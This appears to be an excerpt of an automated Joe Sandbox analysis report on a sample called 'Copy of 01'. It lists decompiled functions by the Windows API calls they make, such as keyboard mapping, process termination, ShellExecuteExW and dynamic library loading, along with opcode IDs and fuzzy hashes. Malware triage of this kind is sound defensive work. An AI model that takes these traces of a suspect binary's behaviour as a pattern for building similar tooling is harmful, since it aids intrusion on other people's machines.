                        • Associated: 00000000.00000002.2189446817.0000000000330000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189517822.00000000003CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189517822.00000000003F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189555355.00000000003FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189570479.0000000000404000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_330000_Copy of 01.jbxd
                        Similarity
                        • API ID: ErrorLastValue___vcrt_
                        • String ID:
                        • API String ID: 3852720340-0
                        • Opcode ID: 995797ac360642b0e60d7f4eb7c93153471c5c3f61bee80cc653904dc1028a51
                        • Instruction ID: 58bc309685bb793319ab707287d7bba639b618725c3d9d159c6f7d406e056b3c
                        • Opcode Fuzzy Hash: 995797ac360642b0e60d7f4eb7c93153471c5c3f61bee80cc653904dc1028a51
                        • Instruction Fuzzy Hash: E2012436619316BEE62727757DC5DA72A98EB053FBB21022DFC10891F0EF218D0E9648
                        Function 00362D74 Relevance: 9.0, APIs: 6, Instructions: 50COMMONLIBRARYCODE
                        Download Yara Rule
                        APIs
                        • GetLastError.KERNEL32(?,?,00365686,00373CD6,?,00000000,?,00365B6A,?,?,?,?,?,0035E6D1,?,003F8A48), ref: 00362D78
                        • _free.LIBCMT ref: 00362DAB
                        • _free.LIBCMT ref: 00362DD3
                        • SetLastError.KERNEL32(00000000,?,?,?,?,0035E6D1,?,003F8A48,00000010,00334F4A,?,?,00000000,00373CD6), ref: 00362DE0
                        • SetLastError.KERNEL32(00000000,?,?,?,?,0035E6D1,?,003F8A48,00000010,00334F4A,?,?,00000000,00373CD6), ref: 00362DEC
                        • _abort.LIBCMT ref: 00362DF2
                        Memory Dump Source
                        • Source File: 00000000.00000002.2189465969.0000000000331000.00000020.00000001.01000000.00000003.sdmp, Offset: 00330000, based on PE: true
                        • Associated: 00000000.00000002.2189446817.0000000000330000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189517822.00000000003CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189517822.00000000003F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189555355.00000000003FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189570479.0000000000404000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_330000_Copy of 01.jbxd
                        Similarity
                        • API ID: ErrorLast$_free$_abort
                        • String ID:
                        • API String ID: 3160817290-0
                        • Opcode ID: 5b97de697c8b924271ceb7415dfe7c41530f44d85bc381115350a52499566e01
                        • Instruction ID: d4b2789fe566684b7fb478adc3dbb381a3d299b34546a53839dc7897a8ef3223
                        • Opcode Fuzzy Hash: 5b97de697c8b924271ceb7415dfe7c41530f44d85bc381115350a52499566e01
                        • Instruction Fuzzy Hash: 9CF0C835A44E0167C2132738BD1AE6F255DAFC37A1F27C418F838DA1DEEF3498114260
                        Function 003C8A24 Relevance: 9.0, APIs: 6, Instructions: 49COMMON
                        Download Yara Rule
                        APIs
                          • Part of subcall function 00349639: ExtCreatePen.GDI32(?,?,00000000,00000000,00000000,?,00000000), ref: 00349693
                          • Part of subcall function 00349639: SelectObject.GDI32(?,00000000), ref: 003496A2
                          • Part of subcall function 00349639: BeginPath.GDI32(?), ref: 003496B9
                          • Part of subcall function 00349639: SelectObject.GDI32(?,00000000), ref: 003496E2
                        • MoveToEx.GDI32(?,-00000002,00000000,00000000), ref: 003C8A4E
                        • LineTo.GDI32(?,00000003,00000000), ref: 003C8A62
                        • MoveToEx.GDI32(?,00000000,-00000002,00000000), ref: 003C8A70
                        • LineTo.GDI32(?,00000000,00000003), ref: 003C8A80
                        • EndPath.GDI32(?), ref: 003C8A90
                        • StrokePath.GDI32(?), ref: 003C8AA0
                        Memory Dump Source
                        • Source File: 00000000.00000002.2189465969.0000000000331000.00000020.00000001.01000000.00000003.sdmp, Offset: 00330000, based on PE: true
                        • Associated: 00000000.00000002.2189446817.0000000000330000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189517822.00000000003CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189517822.00000000003F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189555355.00000000003FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189570479.0000000000404000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_330000_Copy of 01.jbxd
                        Similarity
                        • API ID: Path$LineMoveObjectSelect$BeginCreateStroke
                        • String ID:
                        • API String ID: 43455801-0
                        • Opcode ID: 2a720f713fc64bc7fa54cbafd882cfda3dcc587829b0eedaa337a2aaf5344e61
                        • Instruction ID: a85a6b7708529a49cf51765b60a530242981fe495e23f79403b0cbeeabdfafc8
                        • Opcode Fuzzy Hash: 2a720f713fc64bc7fa54cbafd882cfda3dcc587829b0eedaa337a2aaf5344e61
                        • Instruction Fuzzy Hash: 3E110976400118FFDB129F90DC88FEA7F6CEB08350F048026FA599A1A1C771AE55DFA0
                        Function 003951FD Relevance: 9.0, APIs: 6, Instructions: 49COMMON
                        Download Yara Rule
                        APIs
                        • GetDC.USER32(00000000), ref: 00395218
                        • GetDeviceCaps.GDI32(00000000,00000058), ref: 00395229
                        • GetDeviceCaps.GDI32(00000000,0000005A), ref: 00395230
                        • ReleaseDC.USER32(00000000,00000000), ref: 00395238
                        • MulDiv.KERNEL32(000009EC,?,00000000), ref: 0039524F
                        • MulDiv.KERNEL32(000009EC,00000001,?), ref: 00395261
                        Memory Dump Source
                        • Source File: 00000000.00000002.2189465969.0000000000331000.00000020.00000001.01000000.00000003.sdmp, Offset: 00330000, based on PE: true
                        • Associated: 00000000.00000002.2189446817.0000000000330000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189517822.00000000003CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189517822.00000000003F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189555355.00000000003FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189570479.0000000000404000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_330000_Copy of 01.jbxd
                        Similarity
                        • API ID: CapsDevice$Release
                        • String ID:
                        • API String ID: 1035833867-0
                        • Opcode ID: d806107469f5aec186abb75e1256f14c3a2f2d278d135f14969df1e244741ba0
                        • Instruction ID: 7cea885f61d66a39d5c59e428a735347cd046af2417992d790f2ab0254710616
                        • Opcode Fuzzy Hash: d806107469f5aec186abb75e1256f14c3a2f2d278d135f14969df1e244741ba0
                        • Instruction Fuzzy Hash: B2014475A01714BBEF116BA59D49E5EBF78FB44751F084465FA08EB281D6709810CB60
                        Function 00331BC3 Relevance: 9.0, APIs: 6, Instructions: 44keyboardCOMMON
                        Download Yara Rule
                        APIs
                        • MapVirtualKeyW.USER32(0000005B,00000000), ref: 00331BF4
                        • MapVirtualKeyW.USER32(00000010,00000000), ref: 00331BFC
                        • MapVirtualKeyW.USER32(000000A0,00000000), ref: 00331C07
                        • MapVirtualKeyW.USER32(000000A1,00000000), ref: 00331C12
                        • MapVirtualKeyW.USER32(00000011,00000000), ref: 00331C1A
                        • MapVirtualKeyW.USER32(00000012,00000000), ref: 00331C22
                        Memory Dump Source
                        • Source File: 00000000.00000002.2189465969.0000000000331000.00000020.00000001.01000000.00000003.sdmp, Offset: 00330000, based on PE: true
                        • Associated: 00000000.00000002.2189446817.0000000000330000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189517822.00000000003CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189517822.00000000003F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189555355.00000000003FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189570479.0000000000404000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_330000_Copy of 01.jbxd
                        Similarity
                        • API ID: Virtual
                        • String ID:
                        • API String ID: 4278518827-0
                        • Opcode ID: 1dbf9536b93b398a80692d7e75a7a6eecf7ece35a36c7c4af1574c6ef35f3cc6
                        • Instruction ID: ee8bdd0a28db86e969ce8904682e86a5bc5c0dc111bfc0b855cc15b71d0c14ff
                        • Opcode Fuzzy Hash: 1dbf9536b93b398a80692d7e75a7a6eecf7ece35a36c7c4af1574c6ef35f3cc6
                        • Instruction Fuzzy Hash: F1016CB09027597DE3008F5A8C85B52FFA8FF19354F04411BD15C47A41C7F5A864CBE5
                        Function 0039EB20 Relevance: 9.0, APIs: 6, Instructions: 42windowtimethreadCOMMON
                        Download Yara Rule
                        APIs
                        • PostMessageW.USER32(?,00000010,00000000,00000000), ref: 0039EB30
                        • SendMessageTimeoutW.USER32(?,00000010,00000000,00000000,00000002,000001F4,?), ref: 0039EB46
                        • GetWindowThreadProcessId.USER32(?,?), ref: 0039EB55
                        • OpenProcess.KERNEL32(001F0FFF,00000000,?,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 0039EB64
                        • TerminateProcess.KERNEL32(00000000,00000000,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 0039EB6E
                        • CloseHandle.KERNEL32(00000000,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 0039EB75
                        Memory Dump Source
                        • Source File: 00000000.00000002.2189465969.0000000000331000.00000020.00000001.01000000.00000003.sdmp, Offset: 00330000, based on PE: true
                        • Associated: 00000000.00000002.2189446817.0000000000330000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189517822.00000000003CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189517822.00000000003F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189555355.00000000003FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189570479.0000000000404000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_330000_Copy of 01.jbxd
                        Similarity
                        • API ID: Process$Message$CloseHandleOpenPostSendTerminateThreadTimeoutWindow
                        • String ID:
                        • API String ID: 839392675-0
                        • Opcode ID: fa25b775629497eb7d4134999facb2fb21b837184c1e7ac2448730284f4eaf0d
                        • Instruction ID: f1f1b056a8e0babc836813d6356f38e12b87ef5635e010ae369e9deb46df2eda
                        • Opcode Fuzzy Hash: fa25b775629497eb7d4134999facb2fb21b837184c1e7ac2448730284f4eaf0d
                        • Instruction Fuzzy Hash: 45F0BE72610158BBE7225B639C0EEEF7E7CEFCAB15F041158F605D1090D7A02A01C7B4
                        Function 00387439 Relevance: 9.0, APIs: 6, Instructions: 37windowCOMMON
                        Download Yara Rule
                        APIs
                        • GetClientRect.USER32(?), ref: 00387452
                        • SendMessageW.USER32(?,00001328,00000000,?), ref: 00387469
                        • GetWindowDC.USER32(?), ref: 00387475
                        • GetPixel.GDI32(00000000,?,?), ref: 00387484
                        • ReleaseDC.USER32(?,00000000), ref: 00387496
                        • GetSysColor.USER32(00000005), ref: 003874B0
                        Memory Dump Source
                        • Source File: 00000000.00000002.2189465969.0000000000331000.00000020.00000001.01000000.00000003.sdmp, Offset: 00330000, based on PE: true
                        • Associated: 00000000.00000002.2189446817.0000000000330000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189517822.00000000003CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189517822.00000000003F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189555355.00000000003FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189570479.0000000000404000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_330000_Copy of 01.jbxd
                        Similarity
                        • API ID: ClientColorMessagePixelRectReleaseSendWindow
                        • String ID:
                        • API String ID: 272304278-0
                        • Opcode ID: 799e3b8fc598453bc473c9f9c9a9a83cac68006597b47f545a5cc33f3bb8d383
                        • Instruction ID: 7dea8eba5a749d9861e6462db8ca9d42b8288cd6998699b0e358afc542bc190a
                        • Opcode Fuzzy Hash: 799e3b8fc598453bc473c9f9c9a9a83cac68006597b47f545a5cc33f3bb8d383
                        • Instruction Fuzzy Hash: B6018F31410205EFDB129FA5DD08FEA7BBAFB04311F251060F919E30A1CB312D51EB10
                        Function 00391874 Relevance: 9.0, APIs: 6, Instructions: 23memorysynchronizationCOMMON
                        Download Yara Rule
                        APIs
                        • WaitForSingleObject.KERNEL32(?,000000FF), ref: 0039187F
                        • UnloadUserProfile.USERENV(?,?), ref: 0039188B
                        • CloseHandle.KERNEL32(?), ref: 00391894
                        • CloseHandle.KERNEL32(?), ref: 0039189C
                        • GetProcessHeap.KERNEL32(00000000,?), ref: 003918A5
                        • HeapFree.KERNEL32(00000000), ref: 003918AC
                        Memory Dump Source
                        • Source File: 00000000.00000002.2189465969.0000000000331000.00000020.00000001.01000000.00000003.sdmp, Offset: 00330000, based on PE: true
                        • Associated: 00000000.00000002.2189446817.0000000000330000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189517822.00000000003CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189517822.00000000003F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189555355.00000000003FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189570479.0000000000404000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_330000_Copy of 01.jbxd
                        Similarity
                        • API ID: CloseHandleHeap$FreeObjectProcessProfileSingleUnloadUserWait
                        • String ID:
                        • API String ID: 146765662-0
                        • Opcode ID: 0922549d908556d086e41ceee048fe877e8cce9c1cdda9796075a0cbd9730f2a
                        • Instruction ID: 17fb4ca6e805e2ac1d0cd051674226edfa2a07651f3670239db25e32117c85bf
                        • Opcode Fuzzy Hash: 0922549d908556d086e41ceee048fe877e8cce9c1cdda9796075a0cbd9730f2a
                        • Instruction Fuzzy Hash: D5E0C236414501BBDB025BA2ED0CD0ABB2DFB49B22B109220F229C1470CB32A420DB50
                        Function 0033BBE0 Relevance: 9.0, APIs: 1, Strings: 4, Instructions: 232COMMON
                        Download Yara Rule
                        APIs
                        • __Init_thread_footer.LIBCMT ref: 0033BEB3
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.2189465969.0000000000331000.00000020.00000001.01000000.00000003.sdmp, Offset: 00330000, based on PE: true
                        • Associated: 00000000.00000002.2189446817.0000000000330000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189517822.00000000003CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189517822.00000000003F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189555355.00000000003FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189570479.0000000000404000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_330000_Copy of 01.jbxd
                        Similarity
                        • API ID: Init_thread_footer
                        • String ID: D%@$D%@$D%@$D%@D%@
                        • API String ID: 1385522511-1921936383
                        • Opcode ID: c7dc66ac17504900feead5880d997ebd216b111b2e652e32b198f9a5f7f8413f
                        • Instruction ID: bb118b0d89e2df1c9824a903c518a52dd3e23ea8869386db254085b30d89e7b3
                        • Opcode Fuzzy Hash: c7dc66ac17504900feead5880d997ebd216b111b2e652e32b198f9a5f7f8413f
                        • Instruction Fuzzy Hash: 11915975A0020ADFCB29CF58C4D06AAF7F5FF58314F25816ADA45AB350D771AA81CB90
                        Function 003B7B7E Relevance: 9.0, APIs: 1, Strings: 4, Instructions: 230COMMON
                        Download Yara Rule
                        APIs
                          • Part of subcall function 00350242: EnterCriticalSection.KERNEL32(0040070C,00401884,?,?,0034198B,00402518,?,?,?,003312F9,00000000), ref: 0035024D
                          • Part of subcall function 00350242: LeaveCriticalSection.KERNEL32(0040070C,?,0034198B,00402518,?,?,?,003312F9,00000000), ref: 0035028A
                          • Part of subcall function 00339CB3: _wcslen.LIBCMT ref: 00339CBD
                          • Part of subcall function 003500A3: __onexit.LIBCMT ref: 003500A9
                        • __Init_thread_footer.LIBCMT ref: 003B7BFB
                          • Part of subcall function 003501F8: EnterCriticalSection.KERNEL32(0040070C,?,?,00348747,00402514), ref: 00350202
                          • Part of subcall function 003501F8: LeaveCriticalSection.KERNEL32(0040070C,?,00348747,00402514), ref: 00350235
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.2189465969.0000000000331000.00000020.00000001.01000000.00000003.sdmp, Offset: 00330000, based on PE: true
                        • Associated: 00000000.00000002.2189446817.0000000000330000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189517822.00000000003CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189517822.00000000003F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189555355.00000000003FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189570479.0000000000404000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_330000_Copy of 01.jbxd
                        Similarity
                        • API ID: CriticalSection$EnterLeave$Init_thread_footer__onexit_wcslen
                        • String ID: +T8$5$G$Variable must be of type 'Object'.
                        • API String ID: 535116098-1932661733
                        • Opcode ID: ba7ee17baa2fa533245fe7f425a2cb316ab318cc1f68a6c2362b37c3e49e9297
                        • Instruction ID: 8e37fc7e0bd031957180e0d6a515cccca447c56945e448e6fbb56f30c2e63b85
                        • Opcode Fuzzy Hash: ba7ee17baa2fa533245fe7f425a2cb316ab318cc1f68a6c2362b37c3e49e9297
                        • Instruction Fuzzy Hash: FE919B74A04208AFCB16EF54C891DEDBBB5EF85348F10805DF906AF692DB71AE41CB50
                        Function 0039C5D0 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 191windowCOMMON
                        Download Yara Rule
                        APIs
                          • Part of subcall function 00337620: _wcslen.LIBCMT ref: 00337625
                        • GetMenuItemInfoW.USER32(?,?,00000000,?), ref: 0039C6EE
                        • _wcslen.LIBCMT ref: 0039C735
                        • SetMenuItemInfoW.USER32(?,?,00000000,?), ref: 0039C79C
                        • SetMenuDefaultItem.USER32(?,000000FF,00000000), ref: 0039C7CA
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.2189465969.0000000000331000.00000020.00000001.01000000.00000003.sdmp, Offset: 00330000, based on PE: true
                        • Associated: 00000000.00000002.2189446817.0000000000330000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189517822.00000000003CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189517822.00000000003F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189555355.00000000003FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189570479.0000000000404000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_330000_Copy of 01.jbxd
                        Similarity
                        • API ID: ItemMenu$Info_wcslen$Default
                        • String ID: 0
                        • API String ID: 1227352736-4108050209
                        • Opcode ID: 7710aa114433c01ddb82ce8a831a32142dd3a2185102cb3ce6f6b78facf2b6fc
                        • Instruction ID: 2c2055b45f246f24631369c05e52af54afa4fc8607dfee1ff71c133893b29fbb
                        • Opcode Fuzzy Hash: 7710aa114433c01ddb82ce8a831a32142dd3a2185102cb3ce6f6b78facf2b6fc
                        • Instruction Fuzzy Hash: 2751EF726243009FDB129F68C885B6BB7E8AF49310F082A2DF995E71E0DB74DD04CB52
                        Function 003BAD64 Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 176COMMON
                        Download Yara Rule
                        APIs
                        • ShellExecuteExW.SHELL32(0000003C), ref: 003BAEA3
                          • Part of subcall function 00337620: _wcslen.LIBCMT ref: 00337625
                        • GetProcessId.KERNEL32(00000000), ref: 003BAF38
                        • CloseHandle.KERNEL32(00000000), ref: 003BAF67
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.2189465969.0000000000331000.00000020.00000001.01000000.00000003.sdmp, Offset: 00330000, based on PE: true
                        • Associated: 00000000.00000002.2189446817.0000000000330000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189517822.00000000003CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189517822.00000000003F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189555355.00000000003FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189570479.0000000000404000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_330000_Copy of 01.jbxd
                        Similarity
                        • API ID: CloseExecuteHandleProcessShell_wcslen
                        • String ID: <$@
                        • API String ID: 146682121-1426351568
                        • Opcode ID: 6e6d6ded0f4fb89a9ceeb91be09f681d70083acefb07a9b869afcda6c88efc3e
                        • Instruction ID: e3abea7474b37f7092d13c6a801548e2f7d3db620e35da19ac93007b685e908c
                        • Opcode Fuzzy Hash: 6e6d6ded0f4fb89a9ceeb91be09f681d70083acefb07a9b869afcda6c88efc3e
                        • Instruction Fuzzy Hash: 0D717775A00A18DFCB16DF54C484A9EBBF0BF08314F058499E856AF7A2CB74ED41CB91
                        Function 0039719E Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 120comlibraryloaderCOMMON
                        Download Yara Rule
                        APIs
                        • CoCreateInstance.OLE32(?,00000000,00000005,?,?,?,?,?,?,?,?,?,?,?), ref: 00397206
                        • SetErrorMode.KERNEL32(00000001,?,?,?,?,?,?,?,?,?), ref: 0039723C
                        • GetProcAddress.KERNEL32(?,DllGetClassObject), ref: 0039724D
                        • SetErrorMode.KERNEL32(00000000,?,?,?,?,?,?,?,?,?), ref: 003972CF
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.2189465969.0000000000331000.00000020.00000001.01000000.00000003.sdmp, Offset: 00330000, based on PE: true
                        • Associated: 00000000.00000002.2189446817.0000000000330000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189517822.00000000003CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189517822.00000000003F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189555355.00000000003FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189570479.0000000000404000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_330000_Copy of 01.jbxd
                        Similarity
                        • API ID: ErrorMode$AddressCreateInstanceProc
                        • String ID: DllGetClassObject
                        • API String ID: 753597075-1075368562
                        • Opcode ID: 2c27b52494a5ed717e6b523666422b7824c136e56eda254bbad4d92d756a7fde
                        • Instruction ID: aef1fbe1eb146554f81be2a67f22ce51ac65557b8bff15777f6c4f31df5ed0a4
                        • Opcode Fuzzy Hash: 2c27b52494a5ed717e6b523666422b7824c136e56eda254bbad4d92d756a7fde
                        • Instruction Fuzzy Hash: 31418E72624204EFDF16CF54C884A9A7BA9EF44710F2584A9FD09DF28AD7B1DD40CBA0
                        Function 003C2F17 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 78windowlibraryCOMMON
                        Download Yara Rule
                        APIs
                        • SendMessageW.USER32(00000000,00000467,00000000,?), ref: 003C2F8D
                        • LoadLibraryW.KERNEL32(?), ref: 003C2F94
                        • SendMessageW.USER32(?,00000467,00000000,00000000), ref: 003C2FA9
                        • DestroyWindow.USER32(?), ref: 003C2FB1
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.2189465969.0000000000331000.00000020.00000001.01000000.00000003.sdmp, Offset: 00330000, based on PE: true
                        • Associated: 00000000.00000002.2189446817.0000000000330000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189517822.00000000003CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189517822.00000000003F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189555355.00000000003FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189570479.0000000000404000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_330000_Copy of 01.jbxd
                        Similarity
                        • API ID: MessageSend$DestroyLibraryLoadWindow
                        • String ID: SysAnimate32
                        • API String ID: 3529120543-1011021900
                        • Opcode ID: e74fb0f2eea6cd0bd91886870837b1d529cbe2079a6027dc37d0822608d5402e
                        • Instruction ID: 79338a4c1d4d0a03ca501d166e3cafc585f22e994e2b3670428ced915eb555c7
                        • Opcode Fuzzy Hash: e74fb0f2eea6cd0bd91886870837b1d529cbe2079a6027dc37d0822608d5402e
                        • Instruction Fuzzy Hash: 1E21AC72204209ABEB228F64DC80FBB77BDEB59364F12562CFA50D61A0DB71EC519760
                        Function 00354D6D Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 38libraryloaderCOMMONLIBRARYCODE
                        Download Yara Rule
                        APIs
                        • GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,?,?,?,00354D1E,003628E9,?,00354CBE,003628E9,003F88B8,0000000C,00354E15,003628E9,00000002), ref: 00354D8D
                        • GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 00354DA0
                        • FreeLibrary.KERNEL32(00000000,?,?,?,00354D1E,003628E9,?,00354CBE,003628E9,003F88B8,0000000C,00354E15,003628E9,00000002,00000000), ref: 00354DC3
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.2189465969.0000000000331000.00000020.00000001.01000000.00000003.sdmp, Offset: 00330000, based on PE: true
                        • Associated: 00000000.00000002.2189446817.0000000000330000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189517822.00000000003CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189517822.00000000003F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189555355.00000000003FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189570479.0000000000404000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_330000_Copy of 01.jbxd
                        Similarity
                        • API ID: AddressFreeHandleLibraryModuleProc
                        • String ID: CorExitProcess$mscoree.dll
                        • API String ID: 4061214504-1276376045
                        • Opcode ID: 18badcfbdbb59c4b08fb18e3ea1d0ed0597a0c58453d05eba831195b68eeda5a
                        • Instruction ID: a0c4dd18dcbdfefaca2e9603b6fbe6e90d87aa5378a33bdc364f7aeb5aa1416c
                        • Opcode Fuzzy Hash: 18badcfbdbb59c4b08fb18e3ea1d0ed0597a0c58453d05eba831195b68eeda5a
                        • Instruction Fuzzy Hash: 98F08C35A50208ABDB169B90DC49FEEBBF8EF04712F0400A4EC09A6260CB30A984CB90
                        Function 0038D3A0 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 29libraryloaderCOMMON
                        Download Yara Rule
                        APIs
                        • LoadLibraryA.KERNEL32 ref: 0038D3AD
                        • GetProcAddress.KERNEL32(00000000,GetSystemWow64DirectoryW), ref: 0038D3BF
                        • FreeLibrary.KERNEL32(00000000), ref: 0038D3E5
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.2189465969.0000000000331000.00000020.00000001.01000000.00000003.sdmp, Offset: 00330000, based on PE: true
                        • Associated: 00000000.00000002.2189446817.0000000000330000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189517822.00000000003CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189517822.00000000003F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189555355.00000000003FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189570479.0000000000404000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_330000_Copy of 01.jbxd
                        Similarity
                        • API ID: Library$AddressFreeLoadProc
                        • String ID: GetSystemWow64DirectoryW$X64
